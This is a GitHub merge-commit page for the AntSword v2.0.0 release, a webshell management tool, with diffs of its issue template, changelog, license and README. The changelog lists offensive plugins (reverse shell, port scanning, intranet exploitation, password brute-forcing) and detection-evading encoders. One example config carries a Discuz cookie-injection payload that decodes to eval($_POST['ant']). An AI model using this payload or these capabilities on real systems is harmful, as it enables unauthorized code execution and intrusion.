Merge pull request #95 from AntSwordProject/v2.0-beta

release v2.0.0 (Reborn)
AntSwordProject · Aug 25, 2018 · 72d1f85 · 72d1f85
2 parents 3e23f3f + 8f9d64f
commit 72d1f85
Show file tree

Hide file tree

Showing 1,684 changed files with 437,389 additions and 1,981 deletions.
diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md
@@ -0,0 +1,80 @@
+<!--
+ 您好，感谢您对「中国蚁剑」的支持，您提的建议与发现的Bug将会对我们改进蚁剑非常有用。
+
+ 在提issue之前，我建议您可以先在issue列表中使用搜索功能确保不存在相同或者类似的issue。
+ 确定不存在相似的issue之后，我需要占用您几分钟时间来回答一些最基础的问题。
+ 如果你选中了某一项，可以把该行前面的 `[ ]` 改成 `[x]`。
+
+ issue 模版提供了几个模版，如果这些跟您要提的issue没有关系的话，您可以在提交的时候删除掉该部分。
+
+ Thanks!
+-->
+
+- [ ] 我确定这是蚁剑本身的一个 Bug，我并不是在询问如何使用蚁剑
+- [ ] 我确定已经将蚁剑升级至[软件发布页面](https://github.com/AntSwordProject/AntSword/releases)中的**最新版**
+- [ ] 我已经阅读过蚁剑的开发文档，并且尝试过自己通过Google等方式解决问题
+- [ ] 这是一个新功能的建议
+- [ ] 我查阅了文档没找到解决方案，所以来询问如何使用蚁剑
+
+---
+
+## 报告 Bug
+
+- [ ] 我使用的操作系统是 ***macOS*** 10+
+- [ ] 我使用的操作系统是 ***Debian/Ubuntu*** GNU/Linux
+- [ ] 我使用的操作系统是 ***Fedora*** GNU/Linux
+- [ ] 我使用的操作系统是 ***Arch*** GNU/Linux
+- [ ] 我使用的操作系统是 ***Other*** GNU/Linux
+- [ ] 我使用的操作系统是 ***Windows*** 10+
+
+---
+
+- [ ] 我使用的是 32 位操作系统
+- [ ] 我使用的是 64 位操作系统
+
+### Bug 详细描述
+<!--
+建议详细的说明，方便我们快速度复现 Bug。
+-->
+
+---
+
+## 新功能建议
+
+- [ ] 我确定我所提的新功能不在[待做事项](https://github.com/AntSwordProject/AntSword/blob/master/CHANGELOG.md#待做事项)内，也不在issue列表
+- [ ] 我确定我所提出的新功能是为了方便在网站管理，而不是用于非法用途
+
+### 新功能描述
+<!--
+详细描述您对新功能的期望
+-->
+
+---
+
+## 询问
+
+### shell 连接 Bug
+
+<!--
+请务必提供下面这些详细信息，方便我复现
+-->
+
+1. 服务端操作系统
+
+2. 服务端shell代码
+
+<!--
+需要提供服务端完整代码
+-->
+
+3. 服务端环境配置
+
+<!--
+请提供服务端的相关配置文件，如 php.ini
+-->
+
+4. 客户端连接配置
+
+<!--
+请提供 db.ant 中该 shell 的信息，注意请将 ip 地址脱敏
+-->
diff --git a/.gitignore b/.gitignore
@@ -1,4 +1,3 @@
 node_modules
-static/build
-document/_book
 .DS_*
+antData
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -2,9 +2,206 @@
 > 有空会补补BUG、添添新功能。    
 > 同时也欢迎大家的参与！感谢各位朋友的支持！ .TAT.
 
+## 2018/08/25 `(v2.0.0)`
+
+### 模块增强
+
+* **新增源代码加载器**
+
+ 从 **v2.0.0-beta** 版本开始，我们引入了**加载器**这一概念。
+
+ 用户/开发者只需要下载对应平台的加载器，无需安装额外的环境，即可对源代码进行**编辑**、**执行**、**调试**等操作。可直接运行>=v2.0-beta版本的**开发版**和**发行版**源代码。
+
+ > 有关「加载器」的具体使用方式，可直接查阅 《[AntSowd文档——获取蚁剑](https://doc.u0u.us/zh-hans/getting_started/get_antsword.html)》
+ 
+ ![首次打开加载器](http://7xtigg.com1.z0.glb.clouddn.com/doc/getting_started/get_antsword_1.jpg)
+
+* **新增「加载插件」模块**
+
+ 从 **v2.0.0-beta** 版本开始，我们引入了「插件」这一概念，用户可在不修改核心框架的情况下，通过安装不同的插件来增强、扩展蚁剑的功能。
+
+ 端口扫描、Socks代理、反弹Shell、内网漏洞扫描、内网代理浏览器、内网漏洞溢出测试、后门扫描、密码爆破、打包下载、交互式终端、权限提升...
+
+ **这里将没有任何拘束，可以尽情展现出你对WebShell的理解**。
+
+ 安装插件后，可通过「加载插件」模块调用指定插件。插件有两种调用方式，分别为「单个调用」和「批量调用」，在加载插件后，根据具体的插件显示不同的结果。
+
+ > 有关「加载插件」的使用方式，可直接查阅 《[AntSowd文档——加载插件](https://doc.u0u.us/zh-hans/plugins/load_plugin.html)》
+ >
+ > 如果你对编写插件有兴趣，可查阅 《[AntSowd文档——插件开发](https://doc.u0u.us/zh-hans/plugin_dev/index.html)》，学习如何编写自己的插件。
+
+ **调用插件：**
+
+ ![调用 phpinfo插件](http://7xtigg.com1.z0.glb.clouddn.com/doc/plugins/load_plugin_1.jpg)
+
+ **端口扫描插件的调用结果：**
+ ![端口扫描插件](http://7xtigg.com1.z0.glb.clouddn.com/doc/plugins/load_plugin_4.jpg)
+
+* **新增「插件市场」模块**
+
+ 有了插件功能，如何获取插件呢？从 **v2.0.0-beta** 版本开始，我们引入了「插件市场」。插件作者可将自己插件提交至「插件市场」，向所有AntSword使用者分享自己的插件。
+
+ > 详见《[AntSowd文档——插件市场](https://doc.u0u.us/zh-hans/plugin_store/index.html)》
+
+ ![插件市场](http://7xtigg.com1.z0.glb.clouddn.com/doc/plugin_store/main_page_2.jpg)
+
+* **新增「编码管理」模块**(thx @virink)
+
+ 现在可以在「系统设置 - 编码管理」下增加用户自定义的编码器了，不需要拘泥自带的 `base64` 与 `chr`。`rot13`、`base32`、`rc4`、`aes`......尽情发挥吧
+
+  ![编码管理](http://7xtigg.com1.z0.glb.clouddn.com/doc/settings/encoder_edit_1.png)
+
+* **新增「显示设置」模块**
+
+ Shell数据列表显示太多，有些列就不能隐藏掉吗？完全没问题。
+
+* **新增「浏览网站」模块**
+
+ 碰到需要 Cookie 或者 Basic 认证的站点还要我亲自抓包来填到请求头上去？太麻烦了，直接浏览网站后点击「保存」就能自动将结果添加到 Shell 设置里了。
+
+### 功能增强
+
+* **新增「网站备注」功能**(thx @virink)
+
+ Shell 太多，容易忘记？没关系。添加备注功能来了。
+
+* **新增自定义「HTTP 头」和「请求数据」功能**
+
+ 一些奇奇怪怪的 Shell 和奇奇怪怪的网站居然要在请求的时候带上额外的 HTTP 字段？没关系，添加Shell时加上相应的请求字段就好了。
+
+* **新增自定义「HTTP 请求超时」功能**
+
+ 默认的 10s 超时在网速慢的时候动不动请求超时简直让人抓狂，呐，根据当前Shell的实际情况修改吧。
+
+* **新增自定义「虚拟终端执行路径」功能**
+
+ 偶尔也想换个自己的命令解释程序。
+
+* **新增自定义「虚拟终端缓存」功能**
+
+ 网络差的时候，将命令执行结果缓存起来（**默认关闭**）。
+
+* **新增自定义「文件管理缓存」功能**
+
+ 网络差的时候，将文件管理的结果缓存起来（**默认开启**）。
+
+* **新增自定义「忽略HTTPS证书」功能**
+
+ 过期证书站点请求总是因为证书问题请求失败，那就忽略证书检查吧。
+
+* **新增「随机编码器」功能**
+
+ 每次请求时在当前可用编码器中随机选择一种(编码器:「嚯，哈，看我72变」)。
+
+* **优化虚拟终端，新增「命令补全」功能**
+
+ 常用的命令敲的多了想吐？来试试在「虚拟终端」下按 **Tab**键自动补全吧。
+
+* **优化虚拟终端, 支持命令行粘贴**
+
+ 吐槽了很久的不能粘贴命令的「虚拟终端」终于支持粘贴了。
+
+* **新增「数据库配置」编辑功能**
+
+ 再也不用删掉配置新建了。
+
+* **新增「系统托盘」功能**
+
+ 窗口多的时候快速隐藏/呼出蚁剑（图标什么的别跟我说丑，你找个好看的给大伙瞅瞅?）。
+
+* **新增「预览文件」功能**
+
+ 双击文件自动预览 1.5MB 以内图片，大于该体积的图片可在菜单中选择「预览文件」。
+ ![](http://7xtigg.com1.z0.glb.clouddn.com/doc/file_manager/previewfile.png)
+
+* **优化文件管理，文件列表快速跳行**
+
+ 按下键盘，自动跳到该字母开头的第一个文件所在行。
+
+* **优化「自动更新」功能**
+
+ 程序启动后1分钟自动检查更新，如果存在更新，在提示用户的同时，可直接在线更新。
+
+### 插件
+
+* **新增「端口扫描」插件**
+
+ 通过 Shell 扫描内网主机开放的端口。(前面已经看过图了，就不放了)。
+
+* **新增「生成Shell」插件**
+
+ 指定密码或者随机产生连接密码，然后随机生成一个 Shell 脚本。
+
+ ![生成Shell](http://7xtigg.com1.z0.glb.clouddn.com/plugins/genshell/genshell.png)
+
+* **新增「复制Shell配置」插件**
+
+ 团队合作管理网站必备，复制的不仅是个连接密码，还有数据库配置与 HTTP 配置。
+
+* **新增「Shell配置导入」插件**
+
+ 跟楼上那个配合使用的 :)
+
+ 要不你试试导入一下下面这个 Discuz 代码执行，直接连接的模版？
+
+ ```
+ {"category":"default","url":"http://127.0.0.1/viewthread.php?tid=13&extra=page=1","pwd":"ant","type":"php","ip":"127.0.0.1","addr":"IANA 保留地址用于本地回送","encode":"UTF8","encoder":"chr","httpConf":{"body":{},"headers":{"Cookie":"GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui;GLOBALS[_DCACHE][smilies][replacearray]=eval(CHR(64).CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(39).CHR(97).CHR(110).CHR(116).CHR(39).CHR(93).CHR(41).CHR(59))%3B;"}},"otherConf":{"command-path":"","ignore-https":1,"request-timeout":"5000","terminal-cache":0},"ctime":1489394564927,"utime":1533179198874,"_id":"8Uhsn1z0yeUXS5iG","note":""}
+ ```
+
+* **新增「超级终端」插件**
+
+ 虚拟终端执行命令不能交互，想要个交互式的 Shell？还想直接穿透内网？这里有个Demo了解一下？
+
+ [WebShell下的交互式Shell](http://blog.evalbug.com/2018/07/25/antsword_prompt_shell/)
+
+ > 该插件暂时不太稳定，鉴于有朋友想尝试一下，所以提前上了，别抱太大希望。
+
+* **新增「BugScan 插件」插件**
+
+ 通过 Shell 快速创建 BugScan 节点，然后就可以对内网进行安全检测了。
+
+### 其它
+* 新增 ASP xxxxdog 编码器与对应 Shell 示例
+
+ 这个编码器只能用连接专属 Shell。试着阅读一下这两个脚本，对你编写自己的编码器和专属Shell会很有帮助。
+* 新增 PHP `chr16`、`rot13` 编码器
+* 新增 JSPX Script 示例
+* 新增 ASP.Net eval Script 示例
+* 新增 ASP.Net Custom Script 示例
+* 修复 PHP Shell 读特殊文件无返回问题
+* 修复Windows存在A盘时hang住的问题
+* 新增更新 HTTP 配置 API
+* 修复插件市场删除插件失败的问题
+* 修复多窗口关闭错误问题
+* 修复一些数据错误
+* 优化清空所有缓存功能
+* 优化删除缓存功能
+* 优化删除数据功能
+* 优化编辑数据功能
+* 一些细节的调整
+* 更新 FontAwesome 库到 **v4.5.0**
+* 更新 electron API 到 **v1.2.3**
+ > 这个版本号读起来顺
+
+* 移除 log4js 模块，把后端日志传递到前端输出
+
+ 打开「开发者工具」，在「Console」下试着敲 `antSword["logs"]` 就可查看日志啦。
+
+## 2016/05
+### /03-30
+  **进行了大范围的代码重写以及新功能增加**
+  1. 插件市场包括下载管理等设计
+  2. 插件执行包括模块化等架构
+  3. 日志输出以及其他多出细节的调整
+
+### /02
+  1. 移除`babel`依赖，采用原生ES6进行前端架构
+  2. 移除`document`以及`screenshots`目录，减少体积
+  3. 移除`log4js`模块，把后端日志输出转换到前台控制台
+
 ## 2016/04
 
-### /30
+### /30 `(v1.3.0)`
   1. 重构优化部分代码，删除部分无用资源
 
 ### /29

diff --git a/LICENSE b/LICENSE
@@ -1,6 +1,6 @@
 The MIT License (MIT)
 
-Copyright (c) 2016 Antoor
+Copyright (c) 2016-present Antoor
 
 Permission is hereby granted, free of charge, to any person obtaining a copy
 of this software and associated documentation files (the "Software"), to deal

diff --git a/README.md b/README.md
@@ -1,62 +1,53 @@
-# AntSword
-> AntSword is an `open source` and `cross-platform`'s **Web Site Administration Tool**.     
-> You can use it easily and intuitively to management your website(webshell).
+# AntSword [![release](https://img.shields.io/badge/release-v2.0.0-blue.svg?style=flat-square)][url-release]
 
-[![node](https://img.shields.io/badge/node-4.0+-green.svg?style=flat-square)](https://nodejs.org/en/download/)
-[![release](https://img.shields.io/badge/release-v1.3.0-blue.svg?style=flat-square)][url-release]
+> AntSword in your hands, no worries in your mind！
 
-[中文说明][url-doccn] | [开发文档][url-document] | [CHANGELOG][url-changelog]
+**AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.**
 
-## Start
-If you do not care about how to write the code, you can go to the [Release Page](https://github.com/antoor/antSword/releases) to download the corresponding archive decompression, and then executed directly to use!
+**Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.**
 
-**If you are interested in this code, we welcome you to join!**
+This software, of which the development thought is modularization, is intended to provide easy-to-understand codes and modification guidelines for users of different levels. Therefore, any contribution making by everyone to this project is encouraged, whether large or small. By doing so, this tool can be more convenient and consequently become your most powerful kit！
 
-It does not require much coding knowledge you have, you just need to know what it means and how to modify the code on it!
+[中文说明][url-doczh] / [Document][url-document] / [Changelog][url-changelog]
 
-## Start with source code
+## Development stack
 
-#### 0x01. Get the source code
+- [Electron][url-electron]
+- [ES6][url-es6]
+- [dhtmlx][url-dhtmlx]
+- [Nodejs][url-nodejs]
+* And other libraries called in the project.
 
-``` sh
-$ git clone https://github.com/antoor/antSword.git
-```
+## Screenshots
 
-or
+![][url-mainui]
 
-Click the download url below:
+## Quick Start
 
-```
-https://github.com/antoor/antSword/archive/master.zip
-```
+See document: [Quick Start][url-quickstart]
 
-#### 0x02. Install node_modules
+## Contribute
 
-``` sh
-$ cd antSword
-$ npm install
-```
+See document: [Make contributions to AntSword][url-contribute]
 
-#### 0x03. Began to enjoy
+## Thanks
 
-``` sh
-$ npm start
-```
+> Thanks to anyone who made any contributions.
 
-## Join us
-  * Email: [[email protected]][url-email]
-  * HomePage: [http://uyu.us][url-homepage]
-  * MyWeibo: [http://weibo.com/antoor][url-weibo]
+## LICENSE
 
-## License
-This project is licensed under the terms of the [MIT license][url-mit]
+[LICENSE](./LICENSE)
 
-
-[url-doccn]: README_CN.md
+[url-doczh]: README_CN.md
 [url-changelog]: CHANGELOG.md
+[url-document]: http://doc.u0u.us/en/
+[url-release]: https://github.com/AntSwordProject/AntSword/releases/tag/2.0.0
+[url-electron]: http://electron.atom.io/
+[url-es6]: http://es6.ruanyifeng.com/
+[url-dhtmlx]: http://dhtmlx.com/
+[url-nodejs]: https://nodejs.org/
 [url-homepage]: http://uyu.us
-[url-email]: mailto:[email protected]
-[url-weibo]: http://weibo.com/antoor
-[url-mit]: LICENSE
-[url-document]: http://doc.uyu.us
-[url-release]: https://github.com/antoor/antSword/releases/tag/1.3.0
+[url-release]: https://github.com/AntSwordProject/AntSword/releases
+[url-quickstart]: https://doc.u0u.us/en/getting_started/index.html
+[url-contribute]: https://doc.u0u.us/en/contribute_docs.html
+[url-mainui]: http://7xtigg.com1.z0.glb.clouddn.com/doc/getting_started/get_antsword_2.jpg